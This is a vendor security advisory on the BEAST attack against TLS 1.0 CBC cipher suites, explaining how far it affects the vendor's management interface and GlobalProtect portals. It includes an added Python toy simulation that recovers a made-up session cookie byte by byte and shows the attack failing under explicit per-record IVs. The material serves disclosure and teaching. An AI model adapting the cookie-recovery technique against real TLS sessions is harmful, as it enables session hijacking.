CVE-2011-3389: The BEAST Attack against TLS 1.0
Resolution
Details
In 2011, an attack known as "BEAST" (CVE-2011-3389) was demonstrated against SSL 3.0 and TLS 1.0 when a CBC-mode cipher suite is negotiated. It exploits the fact that in these protocol versions the IV of each record is the last ciphertext block of the previous record, so an attacker who can observe the connection knows the IV before the next plaintext is chosen; TLS 1.1 and later send an explicit, random IV with each record and are not affected. All SSL/TLS connections initiated or terminated by Palo Alto Networks products support TLS 1.0 with CBC-mode cipher suites. However, the practical impact of BEAST on these products is limited in scope.
Palo Alto Networks Device Management Interfaces:
In order for the BEAST attack to be successful, all of the following must be true:
1. The attacker must have network access to the management interface of the device, so that the encrypted traffic between the administrator's browser and the device can be observed. Network security best practice calls for the management interface to be exposed only on a dedicated management network, isolated from production network traffic.
2. The victim administrator must be using a browser that has not been updated with a BEAST mitigation (for example, splitting the first byte of each record into its own record, or disabling CBC-mode cipher suites for SSL 3.0 and TLS 1.0 connections).
3. The attacker must be able to make the victim's browser issue specifically crafted HTTPS requests (for example, through attacker-controlled content loaded in the same browser) while the administrator is logged in to the Palo Alto Networks device web-based management interface in the same browser session, without closing the browser, so that the crafted requests travel over the same TLS session as the administrator's session cookie. Each ciphertext block observed on the wire gives the attacker the IV of the next record; by choosing the plaintext of that record, the attacker can test one guess for one unknown byte of the cookie at a time.
Note: Item 3 is very difficult to perform in a real-world scenario, and the issue is completely mitigated when item 1 does not hold, that is, when the management network is isolated from the production network.
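The mechanism behind item 3, as an added worked example written for this page (it is not Palo Alto Networks code): a toy model of the TLS 1.0 CBC record layer in which each record's IV is the previous record's last ciphertext block, a victim browser that appends a secret session cookie to attacker-chosen request bytes over one open TLS session, and an attacker who watches the wire and recovers the cookie one byte at a time. The block cipher is an HMAC-based stand-in for AES, the browser model and the cookie value are constructed assumptions, and the same attack is run against a TLS 1.1-style explicit per-record IV to show why it fails there.

```python
import hashlib
import hmac
import os

BLOCK = 16


def block_encrypt(key: bytes, block: bytes) -> bytes:
    """Stand-in for AES-128 block encryption E_k (assumption of this example: the
    attack only compares ciphertext blocks and never decrypts, so any keyed
    deterministic 16-byte function shows the same behaviour)."""
    assert len(block) == BLOCK
    return hmac.new(key, block, hashlib.sha256).digest()[:BLOCK]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def tls_pad(data: bytes) -> bytes:
    """TLS CBC padding: n bytes of value n-1, up to the next block boundary."""
    n = BLOCK - (len(data) % BLOCK)
    return data + bytes([n - 1]) * n


class CbcSender:
    """Sender side of a CBC record layer.  explicit_iv=False models SSL 3.0 /
    TLS 1.0, where the IV of a record is the last ciphertext block of the
    previous record (visible on the wire before the next plaintext is chosen).
    explicit_iv=True models TLS 1.1+, which sends a fresh random IV per record."""

    def __init__(self, key: bytes, explicit_iv: bool):
        self.key, self.explicit_iv = key, explicit_iv
        self.chain = os.urandom(BLOCK)  # initial IV derived from the handshake

    def send_record(self, plaintext: bytes) -> bytes:
        iv = os.urandom(BLOCK) if self.explicit_iv else self.chain
        prev, out = iv, b""
        padded = tls_pad(plaintext)
        for i in range(0, len(padded), BLOCK):
            prev = block_encrypt(self.key, xor(padded[i:i + BLOCK], prev))
            out += prev
        self.chain = prev
        return (iv + out) if self.explicit_iv else out


class VictimBrowser:
    """Assumed victim model: attacker-controlled content can make the browser send
    a request whose leading bytes the attacker picks, and the browser appends the
    secret session cookie to every request over the same open TLS session."""

    def __init__(self, sender: CbcSender, cookie: bytes):
        self.sender, self.cookie = sender, cookie

    def request(self, chosen_prefix: bytes) -> bytes:
        return self.sender.send_record(chosen_prefix + self.cookie)  # wire bytes


def beast_recover(browser, last_seen, secret_len, explicit_iv=False):
    """Attacker who watches the wire: recover the cookie one byte at a time.
    last_seen is the most recent ciphertext block observed on the connection."""
    off = BLOCK if explicit_iv else 0  # TLS 1.1+ puts the IV in front of the record
    known = b""
    for i in range(secret_len):
        # Align so that cookie[i] is the last byte of a block whose first 15
        # bytes (filler plus already-recovered cookie bytes) are known.
        filler = b"A" * ((15 - i) % BLOCK)
        rec = browser.request(filler)
        body = rec[off:]
        k = (len(filler) + i - 15) // BLOCK  # index of the target block
        target = body[k * BLOCK:(k + 1) * BLOCK]
        if k > 0:
            prev = body[(k - 1) * BLOCK:k * BLOCK]  # IV that fed the target block
        else:
            prev = rec[:BLOCK] if explicit_iv else last_seen
        known15 = (filler + known)[k * BLOCK:k * BLOCK + 15]
        last_seen = rec[-BLOCK:]
        found = None
        for g in range(256):
            guess = known15 + bytes([g])
            # Cancel the IV predicted for the next record (last_seen) and re-apply
            # the one the target block used (prev): if the guess is right,
            # E_k(x XOR last_seen) equals the target ciphertext block.
            x = xor(xor(guess, prev), last_seen)
            rec2 = browser.request(x)
            last_seen = rec2[-BLOCK:]
            if rec2[off:off + BLOCK] == target:
                found = g
                break
        if found is None:
            return None  # IV prediction failed (explicit IVs): nothing confirmed
        known += bytes([found])
    return known


def demo(explicit_iv: bool):
    cookie = b"session=7f3a9c0e12"  # constructed secret the attacker is after
    browser = VictimBrowser(CbcSender(os.urandom(BLOCK), explicit_iv), cookie)
    warmup = browser.request(b"GET / HTTP/1.1")  # attacker only observes this one
    return beast_recover(browser, warmup[-BLOCK:], len(cookie), explicit_iv)


if __name__ == "__main__":
    print("TLS 1.0 chained IV :", demo(explicit_iv=False))
    print("TLS 1.1 explicit IV:", demo(explicit_iv=True))
```

Each byte costs at most 256 crafted requests, which is why the attack needs the browser to keep issuing attacker-controlled requests over the still-open session. With an explicit per-record IV the attacker cannot pre-cancel the IV when choosing the plaintext, so no guess is ever confirmed and `beast_recover` gives up; record splitting achieves the same effect in TLS 1.0 by making the first encrypted byte of each record unpredictable before the attacker-chosen bytes are encrypted.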
GlobalProtect Portals and Gateways:
Connections from the GlobalProtect client to the portal and gateway for SSL VPN tunnels are not vulnerable to the BEAST attack because, unlike a web browser, the GlobalProtect client does not execute attacker-supplied content and so cannot be made to send the attacker-chosen plaintext that the attack relies on.
When the GlobalProtect portal is accessed through a web browser, the BEAST attack applies under the same conditions described above for the device management GUI. However, at that point the portal's only function is to download the GlobalProtect client; no VPN connection is established through the browser, so the scope is significantly limited.
owner: gwesson